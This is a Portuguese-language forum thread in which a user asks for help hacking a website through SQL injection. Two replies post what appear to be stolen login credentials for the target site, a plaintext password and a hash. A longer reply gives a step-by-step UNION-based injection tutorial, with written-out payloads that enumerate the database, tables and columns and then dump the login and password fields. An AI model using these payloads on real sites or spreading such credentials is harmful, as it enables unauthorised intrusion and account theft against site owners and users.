Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Por Favor Algumem me Ajuda

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Por Favor Algumem me Ajuda

    Tou tentando Hackear um site via SQL injection.
    Mais quando chega nessa parte eu nao consigo mais fazer nada

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Entao alguem poderia midar uma dica!
    Sou novo aki no Forum e to Curtindo muito Aprendi Bastante cisa aqui jah..


    Por Favor Ajudao

  • Font Size
    #2
    cara na sei dizer eu uso havij

    ai o user e a senha
    PAG DE LOGIN:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    LOGIM:maximus
    SENHA:rfc0908
    Não me responsabilizo por seus atos.

    Comment


    • Font Size
      #3
      Opa amigo blz

      Bom já fiz o serviço para vc

      o usuario é

      login maximus
      senha 40a5e35c360ce8dee2db389a100d0884

      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

      Ate mais

      Comment


      • Font Size
        #4
        Galera ele ta querendo aprender como fazer, pra não ficar pedindo toda hora '-'


        Postado Originalmente por rafinhaxpk Ver Post
        Tou tentando Hackear um site via SQL injection.
        Mais quando chega nessa parte eu nao consigo mais fazer nada

        Código:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        Entao alguem poderia midar uma dica!
        Sou novo aki no Forum e to Curtindo muito Aprendi Bastante cisa aqui jah..


        Por Favor Ajudao
        viu que em vez de aparecer o conteúdo do site aparece os números 2,4,6,7 ?
        estas são as colunas vulneráveis, colocamos os códigos em alguma delas para poder coletarmos as informações então o que temos que fazer agora é achar o nome do banco de dados:

        faz assim:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,5,6,7,8,9

        no final da url insira :
        Código:
        from information_schema.tables where table_schema=database()
        e na coluna que aparece no site mude o valor para database()
        ex:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,database(),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
        .
        vc viu que no lugar do 2 eu coloquei "database()"? porque é uma coluna vulnerável como eu te disse, logo vai aparecer o nome do banco de dados.

        ================================================== =====
        Depois disso:
        saber o nome das tabelas
        apenas mude o
        Código:
        "database()" para "group_contat(table_name)"
        ex:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
        ================================================== =====
        agora vamos descobrir o nome de todas as colunas.
        Código:
        PARA saber as COLUNAS das tabelas bonitinho, em group_concat(table_name) no lugar de "table_name", coloque isto :
        "column_name" E DEPOIS  lá no final da url em "from imformation_schema.tables" toque o tables por columns ex:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()

        vai aparecer no site todas as colunas do mesmo, vai lendo rapidinho e procura por login,password,senha,user,usuário..nomes relacionados ao login no seu caso vc tem: login,senha.
        beleza ué a gente sabe que existe a coluna login e senha que é da tabela usuários(porque no seu caso não tem outras tabelas assim)
        .
        agora vc pega o conteúdo da coluna, a parte mais fácil da injeção(odeio agulhas):
        vc irá pegar o nome da tabela que contém a coluna do login e da senha e vai até o final da url,
        a partir do "from" vc apaga tudo e coloca assim "from Nome_da_tabela" ex:
        Código:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from nome_da_tabela (no seu caso, tabela "usuario")
        Ma oee olha só olha só, quem quer dinheiro, hahae!

        no lugar de group_concat(column_name) dentro dos parênteses vc coloca assim.
        ex:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(usuario,0x3a,senha),3,4,5,6,7,8,9 from usuários

        no site que tu quer vai ficar assim:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...,0x3a,senha%29%20from%20usuarios


        ai lá na coluna vai aparecer o login:senha pois o 0x3a é o código dos 2 pontos.


        PRONTO! tu acabou de aprender e já fez um SQL injection básico sem o uso de programas ;D

        Orgulho da mamãe *-* qualquer duvida posta ai, e desculpa pela bagunça kk fiz o tuto agora
        .
        ---


        Agradeça a todos que ajudam bastando clicar em "Obrigado"

        Comment


        • Font Size
          #5
          Ohniugan, Muito Obrigado voce Me Ajudou Bastante *-*

          Comment


          • Font Size
            #6
            da uma olhada nesse video ae leke, vai te ajudar bastante

            [ame]http://www.youtube.com/watch?v=WSmicg4d1QQ[/ame]

            Comment

            X
            Working...
            X